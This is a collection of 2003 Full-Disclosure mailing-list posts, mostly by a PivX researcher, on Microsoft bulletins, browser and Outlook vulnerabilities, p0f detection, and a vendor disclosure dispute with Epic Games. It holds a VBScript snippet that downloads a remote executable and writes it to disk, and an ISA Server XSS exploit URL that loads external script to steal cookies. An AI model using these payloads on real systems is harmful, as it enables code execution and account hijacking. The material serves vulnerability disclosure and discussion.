Well, there will have to be SOME packets entering your network, they will just be indistinguishable from regular traffic. If you wanted to detect passive OS fingerprinting, you might want to test deviations from ordinary patterns of regular traffic, such as a user constantly requesting the same HTTP resource or constantly trying to send the same ICMP packets. You won't be able to detect a p0f scan with some static ruleset, but from the pattern-breaking actions of a user trying to generate lots and lots of legitimate traffic. This would likely become easier if p0f was used as part of some larger toolset.

Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher

- Original Message -
From: Andreas Gietl [EMAIL PROTECTED]
Sent: Thursday, September 04, 2003 9:43 PM
Subject: Re: [Full-Disclosure] Re: [tool] the new p0f 2.0.1 is now out

On Thursday 04 September 2003 20:19, thetic wrote:

it is a passive scan-tool! you can't detect the scans because there are no packets going to your network.

Question concerning the p0f, how can we set up an IDS to detect a p0f scan.

umer
[Full-Disclosure] Re: [Full-Disclosure] 5 Microsoft Security Bulletins in one day ...
From: daniel uriah clemens [EMAIL PROTECTED]

Not all of these are critical!
snip
Only one of these has been labeled critical.

See my other post on the ratings of these, I definitely disagree.

I don't really see the hype.

Neither do I, I just think Peter was happy to see MS releasing multiple advisories on the same day as opposed to spewing them out during a week or two like they usually do with 5 advisories.

Thor
[Full-Disclosure] FW: Microsoft Security Update
I see a trend going on here, Word, Office, Office, Office and Office. I guess Office has been overdue in regards to security bulletins lately :)

MS03-034 (NetBIOS information disclosure) gets a rating of Low, even though Blaster showed us just how many Windows installations run with all ports accessible. It's surprising that MS03-035 (circumventing Office Macro security) and MS03-036 (BO in WordPerfect Converter) got ratings of Important rather than Critical, I guess the bulletins are waiting for some automatic exploit to surface before revision. At least MS03-037 (VBA code execution) got a proper Critical rating. MS03-038 (code execution in Access Snapshot Viewer, an ActiveX control) got a rating of Moderate for webpage based exploits but completely forgets to mention HTML email.

Lots of different ratings and lots of details to consider before system administrators can decide when to apply these patches, but we really want simplicity over complexity. I would still prefer 2 ratings instead of 4, Apply Now or Apply Later - with the latter heading for the bi-weekly patch job. Let's face it, rolling out patches in a big corporation on an almost daily basis is just not very effective or economical.

Which leads to the positive side, it is definitely great to see Microsoft releasing 5 vulnerabilities in a single day, rather than releasing a new one every other day. They must have listened to the feedback from administrators who tired of inefficient and constant patch jobs, and should definitely adhere to this practice in the future. It may be a small step in optimizing the entire patch process, but it's a positive trend. If there is anything we have learnt in the months behind us it is that producing patches is the least of our worries in security, getting administrators and endusers to actually apply those patches is an entirely different ballgame.

Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher

-Original Message-
From: Microsoft [mailto:[EMAIL PROTECTED] osoft.com]
Sent: 3. september 2003 23:46
To: [EMAIL PROTECTED]
Subject: Microsoft Security Update

-BEGIN PGP SIGNED MESSAGE-

THE MICROSOFT SECURITY UPDATE NEWSLETTER
September 3, 2003

The Microsoft Security Update Newsletter for home users and small businesses provides information on security-related updates to Microsoft(R) products, as well as virus alerts and resources for more information on security issues. You have received this update as a subscriber to the Microsoft Security Update Newsletter. To cancel your subscription, follow the instructions at the bottom of this page.

__

SECURITY BULLETIN MS03-034
Security Update for Microsoft Windows
http://go.microsoft.com/?linkid=237617

SEVERITY
Low

WHY WE ARE ISSUING THIS UPDATE
A security issue has been identified in Microsoft Windows(R) that could allow an attacker to see information in your computer's memory over a network. You can help protect your computer by installing this update from Microsoft.

MICROSOFT PRODUCTS AFFECTED BY THIS UPDATE
Windows NT(R) Server 4.0
Windows NT Server 4.0 Terminal Server Edition
Windows 2000
Windows XP
Windows Server(TM) 2003

__

SECURITY BULLETIN MS03-035
Security Update for Microsoft Word
http://go.microsoft.com/?linkid=237618

SEVERITY
Important

WHY WE ARE ISSUING THIS UPDATE
An identified security issue in Microsoft Word(R) could allow an attacker to compromise a Microsoft Windows-based system and then take a variety of actions. For example, an attacker could read files on your computer or run programs on it. By installing this update, you can help protect your computer.

MICROSOFT PRODUCTS AFFECTED BY THIS UPDATE
Word 97, 98(J), 2000, and 2002
Works Suite 2001, 2002, and 2003

__

SECURITY BULLETIN MS03-036
Security Update for Microsoft Office
http://go.microsoft.com/?linkid=237619

SEVERITY
Important

WHY WE ARE ISSUING THIS UPDATE
An identified security issue in Microsoft Office could allow an attacker to compromise a system using Microsoft Office and then take a variety of actions. For example, an attacker could read files on your computer or run programs on it. By installing this update, you can help protect your computer.

MICROSOFT PRODUCTS AFFECTED BY THIS UPDATE
Office 97, 2000, and XP
Word 98(J)
FrontPage 2000 and 2002
Publisher 2000 and 2002
Works Suite 2001, 2002, and 2003

__

SECURITY BULLETIN MS03-037
Security Update for Microsoft Visual Basic for Applications
http://go.microsoft.com/?linkid=237620

SEVERITY
Critical

WHY WE ARE ISSUING THIS UPDATE
An identified security issue in Microsoft Visual Basic(R) for Applications could allow an attacker to compromise a Windows-based system and then take a variety of actions. For example, an attacker could read files on your computer or run programs
Re: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
From: Thor Larholm [EMAIL PROTECTED]

Email is inherently unreliable communication, you should never base the security of your organization on it.

Before someone else corrects me, let me do it myself :)

Of course, since we (TINW) do base a lot of our organization on email being readily available it all turns out to be yet another element of risk analysis. Email is sufficiently reliable for us to trust it, despite that most people fail to question the authenticity of system-critical notifications.

Thor
Re: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
From: Irwan Hadi [EMAIL PROTECTED]

I believe that for infosec stuff, the faster information is distributed/sent, the better. Being late putting on a patch just because the information came almost 1 hour after it was sent might be catastrophic.

Email is inherently unreliable communication, you should never base the security of your organization on it.

Thor
Re: [Full-Disclosure] Need contact in the BTOPENWORLD.COM security department
From: Birl [EMAIL PROTECTED]

As compliant as they can be with the RFC, numerous emails I've sent to both [EMAIL PROTECTED] and [EMAIL PROTECTED] have gone unanswered. And considering that they are outside of the US, I don't bother pursuing it since our government can't do much about it.

Out of curiosity, what do you believe your government can do about USA based companies that do not answer mail sent to abuse and postmaster mailboxes? I'm curious, since a lot of spam-friendly ISPs in USA seem to route those exact mails to /dev/null.

Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Re: [Full-Disclosure] Someone hacked anti-spam database. World bouncing email
Osirusoft is not hacked, all indications simply point at Joe being tired of having an outdated DNSBL list. Letting every single query return a positive, labelling everything as listed, is the perfect way to get the needed attention, especially since most Osirusoft users have been unaware of the ongoing DDoS attack.

This is old news in news.admin.net-abuse.email and news.admin.net-abuse.blocklisting. No hacks, but intentional misconfiguration. As it says, stop using relays.osirusoft.com as a DNSBL since it is outdated and can't be properly updated due to ongoing attacks from spammers.

Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Re: [Full-Disclosure] ADODB.Stream object
HTML files, regardless of security zone, should not in themselves be allowed to write to the local file system or execute arbitrary commands. This is precisely the purpose of HTML Applications (HTA). Just like executing arbitrary commands through codeBase in local zones is a vulnerability that leverages system compromise, so is writing to arbitrary files from the local zone. I definitely think of this as a vulnerability of its own.

Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher

- Original Message -
From: jelmer [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, August 26, 2003 2:55 PM
Subject: [Full-Disclosure] ADODB.Stream object

A few days ago Microsoft patched an Internet Explorer Object Data Remote Execution Vulnerability found by EEYE. Shortly after, HTTP-EQUIV posted some sample code on his website, shortly followed by finjan (pimping their product) on bugtraq. Both were kind of messy so I decided to write my own and thought I might be able to use the ADODB.Stream object to create the file on disk. Unfortunately for some weird reason this didn't quite succeed and I settled on http://ip3e83566f.speed.planet.nl/eeye.html , it is rather slow but does the trick and changing the payload is done in a matter of seconds.

But anyway while playing with the ADODB.Stream object I did find that it allows writing / overwriting of files from within a simple html file when run from a location on your harddisk (and consequentially allowing execution of arbitrary code by for instance overwriting telnet and then calling a telnet:// style URL). This kind of behaviour is generally only allowed from within trusted containers, such as HTA's. Also it doesn't set off norton antivirus's script protection.

Here's a code snippet that illustrates this, it's been tested on IE6 on winXP:

    <script language="vbscript">
    ' ADO constants used below
    const adTypeBinary = 1
    const adSaveCreateOverwrite = 2
    const adModeReadWrite = 3
    ' fetch the binary over HTTP
    set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
    xmlHTTP.open "GET", "http://ip3e83566f.speed.planet.nl/NOTEPAD.EXE", false
    xmlHTTP.send
    contents = xmlHTTP.responseBody
    ' write the response body to disk through ADODB.Stream
    Set oStr = CreateObject("ADODB.Stream")
    oStr.Mode = adModeReadWrite
    oStr.Type = adTypeBinary
    oStr.Open
    oStr.Write contents
    oStr.SaveToFile "c:\test.exe", adSaveCreateOverwrite
    </script>

I don't think it in itself can be considered a security vulnerability as it only works when the file containing the code is present on a user's harddisk, though html files are generally considered trusted and you can probably trick some people into opening an html file by sending it to them through msn messenger or whatever. It can most likely be used to leverage other vulnerabilities, for instance many programs download information to predictable locations from where you might invoke it. Now invoking it from the local disk has been somewhat of a problem since IE6 sp1 as it basically disallows access to file:/// style URL's from the internet.

However there are some (rather messy) workarounds. HTTP-EQUIV posted a way of circumventing this a while back using media player 8, also I found out a long time ago that calling local files from Windows shares is still very much allowed and you can link to html files placed on Windows shares from the internet, though this is rather cumbersome to set up. Other hopefully easier ways will probably pop up.
Re: [Full-Disclosure] ADODB.Stream object
From: Richard M. Smith [EMAIL PROTECTED]

Agreed. However, I would go one step further. I don't think that the typical user has a need for HTML Applications and Windows Scripting Host. Both of these features along with their associated ActiveX controls should be disabled by default in Windows XP. They make writing malware too easy.

HTML Applications and the Windows Scripting Host both run on the same level as ordinary executables, and opening them is no different than opening EXE files. Neither is accessible from HTML. ActiveX is, though.

Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Re: [Full-Disclosure] No more windowsupdate for Windows 2000 Server Family?
Come back later, this happens randomly on all my systems ranging from 95 to 2003. Temporary glitch or a single misconfigured server in a cluster - who knows, who cares *shrug*

Thor

- Original Message -
From: Irwan Hadi [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Sunday, August 24, 2003 10:59 AM
Subject: [Full-Disclosure] No more windowsupdate for Windows 2000 Server Family?

I've just visited http://windowsupdate.microsoft.com to update my Windows 2000 Server and Advanced Server, and I got this every time I went there (with latest IE 6.0, etc. I just want to get the last IE and MDAC updates):

http://v4.windowsupdate.microsoft.com/en/thanks.asp

Thank you for your interest in Windows Update

Windows Update is the online extension of Windows that helps you get the most out of your computer. The latest version of Windows Update is available on computers that are running Microsoft Windows 98, Windows 98 Second Edition, Windows Millennium Edition, Windows 2000 (except Windows 2000 Datacenter Server), Windows XP, and the Windows Server 2003 family.

=

When I tried to open windowsupdate from my Windows 2000 Professional box, it works fine. Now are the Windows 2000 server families unable to use windowsupdate anymore, or what? I think Microsoft should give the server families higher priority than the desktop family since if the server is down, there are more desktops that can't access the things they need to do than if one desktop is down!!!
Re: [Full-Disclosure] Re: Administrivia: Testing Emergency Virus Filter..
From: Drew Copley [EMAIL PROTECTED]

Actually, quite a few don't, some still rely on piggybacking Outlook. But, yes, this trend should be disappearing as people upgrade so their Outlook client will no longer be able to be remote controlled by another application. (Current versions not only block attachments but also the ability for applications to access the api framework, itself).

Specific parts of the API for Outlook are blocked completely (unless the enduser manually approves otherwise), which has also had an effect on existing mainstream applications such as tightly integrated antispam products (I had problems using my favorite, www.spamfighter.com). Precisely because of this, several solutions were devised almost immediately to circumvent these restrictions by proxying through third-party COM objects such as Redemption ( http://www.dimastr.com/redemption/ ) so one could still reach the entire Outlook object model.

Outlook Redemption works around limitations imposed by the Outlook Security Patch and Service Pack 2 of MS Office 2000 and Office XP (which includes Security Patch) plus provides a number of functions to work with properties and functionality not exposed through the Outlook object model.

I like Redemption, not as much for its ability to circumvent the complete API block but for its utility functions which come in quite handy when developing Outlook extensions :)

Even if email clients do start encrypting this information, it will still be easy to bypass because it is local. There is always a crack for local work. But, such a thing may deter some virus writers.

99% of virus writers would have problems understanding the concept of Redemption. I'm still amazed at how many virii rely on enduser interaction when they clearly need not to.

Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Re: [Full-Disclosure] Administrivia: Testing Emergency Virus Filter..
From: Len Rose [EMAIL PROTECTED]

Enough is Enough.. When will people STOP USING MICRO$OFT WINDOWS.

You mean, when will people stop executing unknown attachments? The problem with virii such as this is not the software but the wetware - the bewildered enduser who fails to use his machine in a secure manner responsible to his community.

Thor
Re: [Full-Disclosure] Off-Topic: Defcon Meeting?
From: Daniel Berg [EMAIL PROTECTED]

a little off-topic maybe, but is anyone here going to Defcon this year?

I know I sure am, just look for the curly-haired Danish guy coming in from the cannonball run wrapped in a Danish flag accompanied by an Italian Godfather and the living remains of a motorcycle accident. If you spot me, the first few beers are on me ;)

Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
[Full-Disclosure] Microsoft ISA Server HTTP error handler XSS (TL#007)
Thor Larholm security advisory TL#006 - 16 July 2003
HTML format: http://pivx.com/larholm/adv/TL006

Topic: ISA Server HTTP error handler XSS.
Discovery date: 25 June 2002.
Severity: Medium

Affected applications:
--
Any Microsoft Internet Security and Acceleration (ISA) Server installation that hosts the default HTTP error pages. This includes:

ISA Server 2000

Impact:
---
Stealing cookies from any ISA-protected site, cross-site scripting to any ISA-protected site, hijacking Hotmail and Passport accounts, elevating privileges through ActiveX components, hijacking the MSN Messenger client, etc.

Introduction:
-
CrossSiteScripting is a term that describes the injection of script code on foreign sites. A very likely scenario is where a malicious programmer would inject code on e.g. hotmail.com to steal a victim's cookies, allowing him/her to hijack the victim's email account. The default installation of ISA Server is susceptible to such a XSS error.

Discussion:
---
Every time ISA Server encounters an HTTP error code such as 404 Not Found or 500 Internal Server Error, ISA Server returns an HTTP error handler document which is an HTML file. These HTML files use scripting to output a link to the SERVER.TLD part of the URL, and by crafting a specially formed URL it is possible to include arbitrary script commands on the HTTP error handler document, thereby enabling CrossSiteScripting on any ISA-protected site.

Unlike TL001 we will prefer to trigger a 500 Internal Server error instead of a 404 Not Found error, as the HTTP 500 error handler document can easily be lured out of ISA Server by appending %U0 to the querystring, resulting in an unparsable request. Many other requests can result in ISA Server handing out an HTTP error handler document.

If we look at 404.htm or 500.htm we will notice a particular line of code:

    document.write( '<A HREF="' + escape(urlresult) + '">' + displayresult + '</a>' );

displayResult is derived from the first instance of :// in the URL until the next instance of /. This means that we will have to include our script code before the path part of the URL. To accomplish this we include our script code in the Basic Authentication part of the URL, but we first have to escape any special characters in the code. Any / character will end displayresult prematurely and any spaces will corrupt the DNS lookup, and we therefore replace any space with a TAB (%09) and any / with %5Cx2f (\x2f, as we will dynamically reference an external file).

Exploit:

http://img%09src=%09onerror=document.scripts[0].src=%27http%5Cx3a%5Cx2f% 5Cx2f jscript.dk%5Cx2ftest.js%27;[EMAIL PROTECTED]/%U0

The above will include and execute http://jscript.dk/test.js on YOUR.TLD, provided that YOUR.TLD is protected by an ISA Server installation.

Solution:
-
Apply the MS03-028 patch. You could also use the opportunity to make yourself some nice custom error handler documents.

History:

25 June 2003: Discovery
27 June 2003: Notification to MS with complete advisory
28 June 2003: Reply from MS: This has actually been reported to us by another finder a few weeks ago. We're nearing a release of a bulletin crediting the finder and a patch.
16 July 2003: MS03-028 patch released by MS, no credit for discovery
16 July 2003: Public advisory

Demonstration:
--
I have put together some proof-of-concept examples:

Simple static examples - your cookies from a selection of domains:
http://pivx.com/larholm/adv/TL006/simple.html

Short advanced example - get the cookies from any ISA-protected site:
http://pivx.com/larholm/adv/TL006/advanced.html

References:
---
MS03-028 patch
http://www.microsoft.com/technet/security/bulletin/MS03-028.asp

TL001 IIS allows universal CrossSite Scripting:
- http://www.pivx.com/larholm/adv/TL001/

CERT Cross Site Scripting advisory:
- http://www.cert.org/advisories/CA-2000-02.html

Unpatched IE vulnerabilities:
- http://pivx.com/larholm/unpatched/

Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Re: [Full-Disclosure] how do they do it???
From: [EMAIL PROTECTED]

http://www.albinoblacksheep.com/text/cupholder.php how do you think they do it in PHP?

Thank you for confirming that you have NOT installed the MS03-021 patch [1] for Windows Media Player, which among others removes the ability to eject CD drives using the WMP ActiveX control. I can now safely assume that you are vulnerable to several vulnerabilities. Do you want an HTML email? ;)

[1] http://www.microsoft.com/technet/security/bulletin/ms03-021.asp

Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Re: [Full-Disclosure] how do they do it???
From: morning_wood [EMAIL PROTECTED]

Replies like this are really not needed, are they??? MrSecurity Researcher? I suppose I should lament you on your deficiencies, btw I don't have the patch installed either... by choice. Don't ass-u-me as we all know what that makes you look like.

Wow, people are sure in a temper today. I guess Danish irony is not easily understood (same thing happened to Knud). In case you didn't notice, I was hinting to the list and zorkshin that this 'functionality' has in fact been removed now.

Thor
Re: [Full-Disclosure] The incredible intolerance of Knud
From: Ulf Harnhammar [EMAIL PROTECTED]

I strongly object to people using terms of sexual orientation as a put-down.

I think Knud was just being ironic, and besides we do that a lot in Denmark. The people who are worst at it are some of the most gay people I know, just like my Turkish friends can tell some quite harsh immigration jokes. No harm intended and all..

FWIW, the antivirus companies have classified my phpBB exploit from earlier this year as a virus as well. I've gotten quite a few bounces about that from people who have that Bugtraq post in some mail folder, and who just upgraded their antivirus software.

I still get bounces on several advisories where AV vendors labelled my example code as a virus. We all know that AV vendors are happy to treat the symptom instead of fixing the problem, so what?

Thor
Re: [Full-Disclosure] Right-wing computer virus
From: Richard M. Smith [EMAIL PROTECTED]

snip
http://lists.netsys.com/pipermail/full-disclosure/2003-July/010947.html

I receive minimum a hundred vira a day, each with completely different subject lines, body text and attachment filenames. As Fitzgerald, I fail to see the relevance - from your description it does not sound like the virus has anything new to present or if it is even a new virus.

Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Re: [Full-Disclosure] Internet Explorer 6 DoS Bug
Positively confirmed on 6.0.2800.1106.xpsp2.030422-1633 when entering C:\aux in the Address Bar.

Seeing as the behavior of this scenario is inconsistent between list subscribers with the same IE version, one could believe the bug is not in IE but in urlmon or shellexecute somewhere.

Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher

- Original Message -
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Monday, July 07, 2003 6:25 PM
Subject: [Full-Disclosure] Internet Explorer 6 DoS Bug

Hi,

I found a bug in IE6 on Windows XP with all Service Packs and Patches installed: If you enter C:\aux in the address line of the IE (not EXPLORER, InternetExplorer) and hit enter, the window will freeze. This bug is similar to C:\con\con but not as dangerous. But it's the same reason, namely that Windows tries to open aux, a hardware device in earlier Windows versions. I already sent an email to Microsoft but they said the bug wouldn't exist.

Bye
Fabian Becker (www.neonomicus.ionichost.com)
[EMAIL PROTECTED]
Re: [Full-Disclosure] CD-ROM drive opens
From: Thor Larholm [EMAIL PROTECTED]

Windows Media Player exposes several objects and methods to scripting through a safe-for-scripting, signed ActiveX control. Among those objects are the CD drive objects, which each have an Eject method. This is documented functionality in WMP, if you want to you can easily push the drive in and out in a constant cycle. If you don't like the features then don't use the product :)

I remember people asking questions about ejecting CD drives back in 2000, and remember putting up an example in early 2001 ( http://jscript.dk/2001/3/cdrom.jpg ).

Though undocumented currently, I can now confirm that Microsoft has removed this functionality through the recently released MS03-021 bulletin.

http://www.microsoft.com/technet/security/bulletin/MS03-021.asp

MS03-021 fixes a vulnerability found by jelmer, as well as removing the ability to eject CD drives from webpages.

Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Re: [Full-Disclosure] CD-ROM drive opens
From: Treu, Jill [EMAIL PROTECTED]

Perhaps this could be the issue causing the CD-ROM drive to open? W32/Magold-D is a memory resident worm that uses email, IRC channels, network shared drives and P2P network shares to spread.

It is not a virus, the original poster even included the source code in question.

Windows Media Player exposes several objects and methods to scripting through a safe-for-scripting, signed ActiveX control. Among those objects are the CD drive objects, which each have an Eject method. This is documented functionality in WMP, if you want to you can easily push the drive in and out in a constant cycle. If you don't like the features then don't use the product :)

I remember people asking questions about ejecting CD drives back in 2000, and remember putting up an example in early 2001 ( http://jscript.dk/2001/3/cdrom.jpg ).

Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Re: [Full-Disclosure] O UTLO OK EXP RE SS 6 .00 : broken
Outlook Express is not the only vulnerable product. The culprit here is the codebase localPath vulnerability which was patched in Internet Explorer by MS02-015 in March 2002. GreyMagic had more fun with this at http://security.greymagic.com/adv/gm001-ie/ which is also the origin of the example displayed.

MS02-015 crippled codeBase quite severely in Internet Explorer, completely removing most of its functionality in the Internet Zone. It is still possible to use this vulnerability in Internet Explorer in any local security zone, but getting to that zone in the first place is in itself an obstacle.

Whatever Microsoft patched in MS02-015 (crippling codeBase in the Internet Zone to avoid the command execution vulnerability) was only applied to the IE-specific parts of MSHTML and not to any shared parts that third-party programs such as Outlook and Outlook Express utilize. This despite our impression that MS02-015 removed the problem.

This is apparent if you examine Outlook 2000 which can also execute arbitrary commands automatically upon reading mails if you have set the security zone to the Internet Zone - just like Outlook Express as displayed by http-equiv.

The default security zone for Outlook 2000 is the Internet Zone. Only after you apply Office 2000 Service Pack 3 is the default zone changed to the Restricted zone, so remember either to apply O2KSP3 or manually change your zone settings to Restricted at your earliest convenience.

Does Eudora still use the Internet Zone for viewing HTML mail? If so, it is also still vulnerable to the codeBase command execution vulnerability, like any other application that is embedding MSHTML.

Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Latest PivX research: Multi-Vendor Unreal Engine Advisory
http://www.pivx.com/press_releases/ueng-adv_pr.html

- Original Message -
From: [EMAIL PROTECTED] [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Saturday, February 22, 2003 4:36 PM
Subject: O UT LO OK E XPRE SS 6 .00 : broken

Saturday, February 22, 2003

Technical silent delivery and installation of an executable no client input other than reading an email or viewing a newsgroup message. Outlook Express 6.00 SP1 Cumulative Pack 1 2 3 4 whatever.

Rest of original http-equiv post at http://www.ntbugtraq.com/default.asp?pid=36sid=1A2=ind0302L=ntbugtraqF=P S=P=5888

The rest was snipped to avoid barking from premenstrual antivirus scanners.
[Full-Disclosure] Epic Games threatens to sue security researchers
On February 5th, Luigi Auriemma of PivX Solutions released a tightly packed advisory detailing multiple vulnerabilities in the Unreal network gaming engine developed by Epic Games. These vulnerabilities affect both clients and servers who are playing the plethora of games that are using the engine, and have been readily exploitable for 5 years.

The press release: http://www.pivx.com/press_releases/ueng-adv_pr.html
The advisory itself: http://www.pivx.com/luigi/adv/ueng-adv.txt

Following both industry and personal standards, PivX gave Epic Games a duration of 30 days to (at the very least) respond to our private notification to them. After nothing had happened during that month we prepared to release the advisory, yet once the press asked Epic Games for comments they were suddenly very responsive. Promises to work closely with us on the vulnerability and advisory were made and we managed to hold down the press for several months after this.

60 days passed after this, without any collaboration, honest effort or actual contact from Epic Games. We released the advisory after 90 days had passed from the original vendor notification. 90 days, in which we were played like fools, in which Epic Games had ample time and sufficient opportunity to react and work with us on a coordinated release. 90 days in which Epic Games, from the best of our comprehension, had archived our communications in the trash, during which we received no serious communication except for crisis handling at the originally planned release time.

On February 6th, BluesNews (among many others) could cite a quote from Mark Rein, Epic Games Vice President:

"I won't sugar coat this. We f***ed up on this. Yes this is real and yes this was brought to our attention and yes we should have fixed it by now."

http://www.bluesnews.com/cgi-bin/board.pl?action=viewthreadthreadid=39954

On February 11th the tides have changed, and TechTV are reporting public legal threats from that same person:

"This is slanderous," he says. "They've taken this too far. We're getting our lawyers involved with this."

http://www.techtv.com/news/security/story/0,24195,3417248,00.html

I fail to see how Mark Rein on one hand can publicly announce this to be a real threat that they should have fixed earlier, and on the other hand can announce the advisory to be false and malicious statements. There is no slander or libel in any aspect of this, and the only imaginable outcome that Mark Rein must have been aiming for by his declaration of lawyer involvement is to silence future security research on Epic Games products through the promise of unfounded barratry.

As we know from precedents in the past, this approach to security is counterproductive at best and encouraging for underground security research at worst, and I can only hope for an official retraction of this policy by Epic Games once other employees have had half a minute to think about the implications and example that Mark Rein is setting forth.

In the past, I have received better nonresponsive treatment by Microsoft when their security handling was at its worst. Contrary to the vast improvements that Microsoft has gone through over the last year and a half, Epic Games did not even start to acknowledge the problem properly before a full public disclosure had been made on February 5th.

I believe that Luigi, and all of PivX, has handled this issue in a courteous, professional and ethical manner, and the uncoordinated release that was its outcome is a direct result of a nonresponsive vendor that at best is plainly ignorant and at worst acts directly against the best interest and security of its own customers.

Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Latest PivX research: Multi-Vendor Unreal Engine Advisory
http://www.pivx.com/press_releases/ueng-adv_pr.html
[Full-Disclosure] Fw: Epic Games threatens to sue security researchers
- Original Message -
From: Mark Rein [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, February 11, 2003 8:31 PM
Subject: Re: Epic Games threatens to sue security researchers
In-Reply-To: 01ce01c2d1f1$1beebef0$[EMAIL PROTECTED]

Thor,

I have sent your company an apology for those completely unfortunate comments that I sincerely regret. We did provide an official statement and I was not, at the time, aware that my verbal reaction, in a moment of shock and surprise, was being captured for the article. The comment was a complete over-reaction to seeing the list of games including future games that have not yet been published. It had nothing to do with the security issues themselves, the validity of the report, or the way Pivx presented it to us.

Pivx gave us more than fair enough warning of the bugs and we simply failed to fix them in the allotted time. We released a statement last week to the Unreal community indicating that we fucked up in not addressing these concerns within the given time and that we were already testing a patch with the security issues corrected. In addition the official statement we gave pointed out that we were fixing the holes and that the Pivx report was fair and accurate. Licensees were already provided with the source code for the security fixes.

Again this was a moment-of-stupidity reaction and I sincerely apologize to Pivx and the entire security community. Epic has already stated that we will take these matters far more seriously in the future.

Mark Rein, Epic Games Inc.
Visit us at http://www.epicgames.com
[Full-Disclosure] Fw: TRACE used to increase the dangerous of XSS.
- Original Message -
From: Thor Larholm [EMAIL PROTECTED]
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]
Sent: Thursday, January 23, 2003 10:10 AM
Subject: RE: TRACE used to increase the dangerous of XSS.

I just finished reading this so-called whitepaper and the press release, and all I can say is hyped, sensationalised snakeoil.

The HttpOnly cookie feature, a proprietary Microsoft extension designed to mitigate a single aspect of XSS, can be circumvented in myriads of ways. In fact, reading the HTTP response in any other way than through the document.cookie property immediately exposed through JS will return the cookie to you. Calling from JS to a Java applet that in turn parses a HTTP response, using a Flash movie (or most any other plugin) or even needlessly complicating matters by parsing the BODY of a TRACE response received through XMLHTTP - such as this 'whitepaper' suggests. By design, HttpOnly makes the cookie available only through the HTTP headers - which, among many others, the XMLHTTP control can read.

What we end up with from WhiteHat Security is a way to circumvent the HttpOnly cookie feature in IE6SP1, nothing else. In itself, worthy of a note in a roundup of browser problems or a comment in a reply to the posting announcing the HttpOnly feature on Bugtraq - but hardly a whitepaper, press release and blurbs such as comparing this to Code Red and Nimda or calling this a flaw in all web servers worldwide.

This is simply not a new class of web-app-sec attack or a flaw in TRACE, as hyped by WhiteHat Security. System administrators should most definitely not waste their precious time on implementing the silly workarounds suggested, such as disabling TRACE/TRACK requests. The one, and only, impact the discovery from WhiteHat Security has is that it re-enables cookie reading from JS despite if you had already cared to specifically alter your web application to accommodate this.

All the boojah and fuss about not requiring an actual XSS in the web application or being able to impose XSS on arbitrary foreign domains, factors that would indeed be a cause of concern, is utterly and completely unrelated to the findings of WhiteHat Security. These are mere demonstrations of already publicly known unpatched vulnerabilities in Internet Explorer ( of which there are currently 19 - http://www.pivx.com/larholm/unpatched/ ).

WhiteHat Security paired a minor low-impact notice of their own with existing proof-of-concept code from several critical high-impact vulnerabilities discovered, and long disclosed, by third-party researchers, dubbed it their own and wrote up a fancy press release filled with inaccuracies announcing an indifferent 'whitepaper' scattered with obscure irrelevancies.

In short, snakeoil.

Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Latest PivX research: Multi-vendor Game Server DDoS Vulnerability
http://www.pivx.com/press_releases/mk_mk001.html

-Original Message-
From: Jeremiah Grossman [mailto:[EMAIL PROTECTED]]
Sent: 22 January 2003 21:33
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: TRACE used to increase the dangerous of XSS.

WhiteHat Security has released a new white paper discussing a new class of web-app-sec attack (XST) which potentially affects all web servers supporting TRACE. The white paper explains all the detailed technical results we have found so far. We are fairly certain this particular issue will spark much debate and encourage those interested to read and comment.

White Paper Mirrors:
http://www.betanews.com/whitehat/WH-WhitePaper_XST_ebook.pdf
http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf
http://www.boarder.org/WH-WhitePaper_XST_ebook.pdf
http://www.forumgalaxy.com/whmirror/WhitePaper_screen.pdf

Press Release
http://www.whitehatsec.com/press_releases/WH-PR-20030120.txt
Re: [Full-Disclosure] Re: New Web Vulnerability - Cross-Site Tracing
From: H D Moore [EMAIL PROTECTED]

Although it's definitely an interesting way to compromise client-side headers, the root of the vulnerability is the XMLHTTP component's ability to act like a HTTP proxy. Client-side scripting components should only be allowed to interact with the site which served them up, otherwise you open a huge can of worms, where XSS and user-credential theft are only the squishy little ones on top.

Isn't it great then to realize that XMLHTTP, in fact, can only interact with the site which served them - exactly as you desire? The proxy features and XSS to arbitrary foreign sites examples that are demonstrated in this 'whitepaper' are merely demonstrations of already publicly known unpatched vulnerabilities in IE. They have nothing to do with any of the findings presented.

http://jscript.dk/2003/1/sec/xst-reply.txt

Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Latest PivX research: Multi-vendor Game Server DDoS Vulnerability
http://www.pivx.com/press_releases/mk_mk001.html
[Full-Disclosure] Fw: reply
Hi Lel,

Put a lid on it and yell at the moon. I fart in the general direction of your measly attempt of a SLAPP.

FD list: This is the guy we discussed some months ago, who wanted help in taking the cached copies of his criminal records off Google:

